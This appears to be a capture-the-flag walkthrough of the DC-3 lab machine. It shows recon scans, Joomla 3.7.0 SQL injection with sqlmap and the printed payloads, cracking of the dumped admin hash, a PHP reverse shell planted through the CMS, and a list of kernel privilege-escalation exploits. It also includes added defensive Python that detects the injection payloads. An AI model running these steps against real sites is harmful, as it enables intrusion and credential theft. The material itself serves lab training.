The attacker is using Kali.
Flow of this attack
・Find the target's IP and web directories
・Obtain a username and password through a vulnerability exploit (SQL injection)
・Log in to the CMS
・Create a reverse shell
・Log in to the web server via the reverse shell
・Look for / exploit a privilege escalation vulnerability
・With root privileges, get into /root and grab the flag.
First, the usual: identify the target's IP and run nmap.
Currently scanning: 192.168.10.0/16 | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 5 hosts. Total size: 324
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.3.1 30:f7:72:be:b9:b9 1 42 Hon Hai Precision Ind. Co.,Ltd.
192.168.3.2 10:6f:3f:e6:28:40 2 120 BUFFALO.INC
192.168.3.12 70:bc:10:6a:f6:c1 1 42 Microsoft Corporation
192.168.3.20 08:00:27:ab:aa:6e 1 60 PCS Systemtechnik GmbH
192.168.3.16 44:09:b8:8c:f4:72 1 60 Salcomp (Shenzhen) CO., LTD.
┌──(root💀snowyowl)-[~/dirsearch]
└─# nmap -sS -A -Pn 192.168.3.20 -p- 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-03 12:09 JST
Nmap scan report for 192.168.3.20
Host is up (0.00072s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 08:00:27:AB:AA:6E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.3.20
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
Since DC-3 turned out to be a web server, enumerate its public web directories with nikto and dirsearch.
┌──(root💀snowyowl)-[~/dirsearch]
└─# nikto -h 192.168.3.20
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.20
+ Target Hostname: 192.168.3.20
+ Target Port: 80
+ Start Time: 2021-09-03 12:09:49 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8726 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2021-09-03 12:11:01 (GMT9) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root💀snowyowl)-[~/dirsearch]
└─
banner.txt db Dockerfile logs requirements.txt static
CHANGELOG.md default.conf __init__.py README.md setup.cfg thirdparty
CONTRIBUTORS.md dirsearch.py lib reports setup.py
┌──(root💀snowyowl)-[~/dirsearch]
└─
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/dirsearch/reports/192.168.3.20/-_21-09-03_12-11-29.txt
Error Log: /root/dirsearch/logs/errors-21-09-03_12-11-29.log
Target: http://192.168.3.20/
[12:11:29] Starting:
[12:11:32] 403 - 298B - /.ht_wsr.txt
[12:11:32] 403 - 301B - /.htaccess.bak1
[12:11:32] 403 - 301B - /.htaccess.orig
[12:11:32] 403 - 303B - /.htaccess.sample
[12:11:32] 403 - 301B - /.htaccess.save
[12:11:32] 403 - 301B - /.htaccess_orig
[12:11:32] 403 - 300B - /.htaccessOLD2
[12:11:32] 403 - 299B - /.htaccess_sc
[12:11:32] 403 - 302B - /.htaccess_extra
[12:11:32] 403 - 291B - /.htm
[12:11:32] 403 - 299B - /.htaccessOLD
[12:11:32] 403 - 299B - /.htaccessBAK
[12:11:32] 403 - 292B - /.html
[12:11:32] 403 - 298B - /.httr-oauth
[12:11:32] 403 - 297B - /.htpasswds
[12:11:32] 403 - 301B - /.htpasswd_test
[12:11:33] 403 - 291B - /.php
[12:11:33] 403 - 292B - /.php3
[12:11:37] 200 - 18KB - /LICENSE.txt
[12:11:37] 200 - 4KB - /README.txt
[12:11:47] 301 - 320B - /administrator -> http://192.168.3.20/administrator/
[12:11:47] 403 - 310B - /administrator/.htaccess
[12:11:47] 200 - 2KB - /administrator/includes/
[12:11:47] 200 - 31B - /administrator/cache/
[12:11:47] 200 - 5KB - /administrator/
[12:11:47] 301 - 325B - /administrator/logs -> http://192.168.3.20/administrator/logs/
[12:11:47] 200 - 31B - /administrator/logs/
[12:11:47] 200 - 5KB - /administrator/index.php
[12:11:51] 301 - 310B - /bin -> http://192.168.3.20/bin/
[12:11:51] 200 - 31B - /bin/
[12:11:52] 200 - 31B - /cache/
[12:11:52] 301 - 312B - /cache -> http://192.168.3.20/cache/
[12:11:53] 200 - 31B - /cli/
[12:11:53] 301 - 317B - /components -> http://192.168.3.20/components/
[12:11:53] 200 - 31B - /components/
[12:11:54] 200 - 0B - /configuration.php
[12:12:02] 200 - 3KB - /htaccess.txt
[12:12:03] 301 - 313B - /images -> http://192.168.3.20/images/
[12:12:03] 200 - 31B - /images/
[12:12:03] 301 - 315B - /includes -> http://192.168.3.20/includes/
[12:12:03] 200 - 31B - /includes/
[12:12:04] 200 - 8KB - /index.php
[12:12:06] 301 - 315B - /language -> http://192.168.3.20/language/
[12:12:06] 200 - 31B - /layouts/
[12:12:06] 200 - 31B - /libraries/
[12:12:06] 301 - 316B - /libraries -> http://192.168.3.20/libraries/
[12:12:09] 301 - 312B - /media -> http://192.168.3.20/media/
[12:12:09] 200 - 31B - /media/
[12:12:10] 301 - 314B - /modules -> http://192.168.3.20/modules/
[12:12:10] 200 - 31B - /modules/
[12:12:17] 200 - 31B - /plugins/
[12:12:17] 301 - 314B - /plugins -> http://192.168.3.20/plugins/
[12:12:20] 200 - 836B - /robots.txt.dist
[12:12:22] 403 - 300B - /server-status
[12:12:22] 403 - 301B - /server-status/
[12:12:27] 301 - 316B - /templates -> http://192.168.3.20/templates/
[12:12:27] 200 - 31B - /templates/
[12:12:27] 200 - 0B - /templates/beez3/
[12:12:27] 200 - 31B - /templates/index.html
[12:12:27] 200 - 0B - /templates/protostar/
[12:12:27] 200 - 0B - /templates/system/
[12:12:28] 301 - 310B - /tmp -> http://192.168.3.20/tmp/
[12:12:29] 200 - 31B - /tmp/
[12:12:32] 200 - 2KB - /web.config.txt
Task Completed
There is also a security scanner dedicated to this CMS (Joomla), so use it to dig into the details.
┌──(root💀snowyowl)-[~/dirsearch]
└─# joomscan -u http://192.168.3.20/
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.3.20/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.3.20/administrator/components
http://192.168.3.20/administrator/modules
http://192.168.3.20/administrator/templates
http://192.168.3.20/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.3.20/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.3.20/
The results so far gave us the Joomla version, so check whether there are any exploits targeting vulnerabilities in it.
┌──(root💀snowyowl)-[~]
└─# searchsploit "Joomla 3.7.0"
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
A SQL injection was found.
The exploit-db entry (www.exploit-db.com) provides a SQL injection template, so use it:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
In the actual run, the list[fullordering] parameter is used exactly as in the template.
┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:25:55 /2021-09-03/
[12:25:55] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:25:55] [INFO] resuming back-end DBMS 'mysql'
[12:25:55] [INFO] testing connection to the target URL
[12:25:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=pt7u81sacce...hsvbocmn87'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:25:59] [INFO] fetching database names
[12:25:59] [INFO] resumed: 'information_schema'
[12:25:59] [INFO] resumed: 'joomladb'
[12:25:59] [INFO] resumed: 'mysql'
[12:25:59] [INFO] resumed: 'performance_schema'
[12:25:59] [INFO] resumed: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[12:25:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:25:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'
[*] ending @ 12:25:59 /2021-09-03/
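As an added defensive illustration that is not part of the original post, this Python scans constructed Apache access-log lines for the UPDATEXML and SLEEP payloads sqlmap reported above in list[fullordering], and contains the allow-list check ("<column> ASC|DESC") that a hardened sort parameter should pass; the allow-listed column names and the log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for a Joomla-style list[fullordering] sort parameter: "<column> ASC|DESC".
# The column names are an illustrative assumption, not Joomla's own list.
ALLOWED_COLUMNS = {"a.id", "a.title", "a.state", "a.ordering", "a.created_time"}
ORDERING_RE = re.compile(r"^([A-Za-z]\.[A-Za-z_]+) +(ASC|DESC)$", re.IGNORECASE)

# Function names and keywords typical of MySQL error-based and time-based injection.
SQL_MARKERS = re.compile(
    r"updatexml|extractvalue|sleep *\(|benchmark *\(|\bselect\b|concat *\(",
    re.IGNORECASE,
)

# Apache combined-log request line; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def ordering_is_valid(value):
    """Hardened check: accept only '<allow-listed column> ASC|DESC', nothing else."""
    m = ORDERING_RE.match(value.strip())
    return bool(m) and m.group(1).lower() in ALLOWED_COLUMNS


def inspect_request(line):
    """Return an alert for a com_fields request whose sort value fails the allow-list."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if query.get("option", [""])[0] != "com_fields":
        return None
    for value in query.get("list[fullordering]", []):  # parse_qs percent-decodes it
        if ordering_is_valid(value):
            continue
        reason = "sql-marker" if SQL_MARKERS.search(value) else "not-allow-listed"
        return {"ip": m.group("ip"), "status": int(m.group("status")),
                "value": value, "reason": reason}
    return None


def scan_log(lines):
    """Run inspect_request over every line and keep the alerts, in log order."""
    return [a for a in (inspect_request(line) for line in lines) if a]


# Constructed sample log lines (not from the original post), built around the
# UPDATEXML and SLEEP payloads sqlmap reported above; spaces are %20-encoded
# as a client would send them.
SAMPLE_LOG = [
    '192.168.3.1 - - [03/Sep/2021:12:20:01 +0900] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=a.title%20ASC HTTP/1.1" 200 8123',
    '192.168.3.1 - - [03/Sep/2021:12:25:55 +0900] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,'
    '0x717a787871,(SELECT%20(ELT(1743=1743,1))),0x71626b6a71),2253)) HTTP/1.1" 500 1219',
    '192.168.3.1 - - [03/Sep/2021:12:25:58 +0900] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=(SELECT%209285%20FROM%20(SELECT'
    '(SLEEP(5)))oGde) HTTP/1.1" 200 8123',
    '192.168.3.1 - - [03/Sep/2021:12:26:10 +0900] "GET /administrator/index.php'
    ' HTTP/1.1" 200 5102',
    '192.168.3.1 - - [03/Sep/2021:12:26:30 +0900] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=a.hits%20DESC HTTP/1.1" 200 8123',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The 500 on the error-based request is the same side effect sqlmap warned about above, so pairing a non-allow-listed sort value with a 5xx response is a strong signal.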
Now that the databases are known, list the tables inside joomladb.
┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables
___
__H__
___ ___[.]_____ ___ ___ {1.5.7#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:28:57 /2021-09-03/
[12:28:57] [INFO] fetched random HTTP User-Agent header value 'Opera/9.00 (X11; Linux i686; U; de)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:28:57] [INFO] resuming back-end DBMS 'mysql'
[12:28:57] [INFO] testing connection to the target URL
[12:28:58] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=shu32a83a3i...vqs1g25h14'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:29:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:29:00] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
[12:29:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:29:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'
[*] ending @ 12:29:00 /2021-09-03/
The users table looks suspicious, so check whether it has username and password columns, and dump them if it does.
┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.7#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:37:44 /2021-09-03/
[12:37:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:37:44] [INFO] resuming back-end DBMS 'mysql'
[12:37:44] [INFO] testing connection to the target URL
[12:37:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=8d3l6tqthp3...9qk5fv1qh4'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:37:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:37:46] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
[12:37:46] [INFO] fetching entries of column(s) 'name,password' for table '#__users' in database 'joomladb'
[12:37:46] [INFO] resumed: 'admin'
[12:37:46] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
Database: joomladb
Table: #__users
[1 entry]
+-------+--------------------------------------------------------------+
| name | password |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+
[12:37:46] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.3.20/dump/joomladb/#__users.csv'
[12:37:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:37:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'
[*] ending @ 12:37:46 /2021-09-03/
With the hash dumped, crack admin's password using john.
$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy (?)
Cracking it with john reveals admin:snoopy.
So use this username and password to log in to the site.
Login succeeded.
Create a reverse shell.
Create a new index2.php and turn it into the reverse shell.
Creating the reverse shell, and the payload:
┌──(root💀snowyowl)-[~]
└─# locate php-reverse-shell.php
/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
┌──(root💀snowyowl)-[~]
└─# nc -lvp 666
The payload worked, so let's poke around a little.
/etc/passwd often has password hashes written in it, so check there first.
meterpreter > cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
However, everything is nologin, and there is no hint of a privilege escalation path at all.
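As an added example that is not part of the original post, the following Python does the /etc/passwd review above programmatically: it parses passwd(5) lines and flags interactive shells, extra UID 0 accounts, hashes stored in passwd itself and empty password fields; the sample is the excerpt shown above plus two constructed lines, and the shell list is an assumption.

```python
# Shells that give an interactive login; an illustrative set, extend as needed.
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh",
                      "/usr/bin/bash", "/usr/bin/zsh"}
# Password-field values meaning "look in /etc/shadow" or "account locked".
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; raises on a malformed line."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "passwd": passwd, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return the account properties a defender checks in this file."""
    findings = {"interactive": [], "extra_uid0": [],
                "hash_in_passwd": [], "empty_password": []}
    for e in parse_passwd(text):
        if e["shell"] in INTERACTIVE_SHELLS:
            findings["interactive"].append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings["extra_uid0"].append(e["name"])
        if e["passwd"] == "":
            findings["empty_password"].append(e["name"])  # no password required
        elif e["passwd"] not in LOCKED_OR_SHADOWED:
            findings["hash_in_passwd"].append(e["name"])  # hash readable by everyone
    return findings


# Excerpt of the /etc/passwd shown above, plus two constructed lines ("legacy" and
# "nopass") that do not exist on the box, added to show what the audit would flag.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
legacy:$6$PLACEHOLDER$notarealhash:0:0:constructed:/root:/bin/sh
nopass::1001:1001:constructed:/home/nopass:/bin/bash
"""

if __name__ == "__main__":
    for key, names in audit_passwd(SAMPLE_PASSWD).items():
        print("%-15s %s" % (key, ", ".join(names) or "-"))
```

On the box itself only root and dc3 would appear under interactive, which is exactly what the manual read-through above concluded.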
Look at the OS version of this server.
meterpreter > cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
Searching with searchsploit turned up code exploiting Ubuntu 16.04 vulnerabilities.
┌──(root💀snowyowl)-[~]
└─# searchsploit "Ubuntu 16.04"
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-vid | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/2 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arb | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metas | linux/local/40759.rb
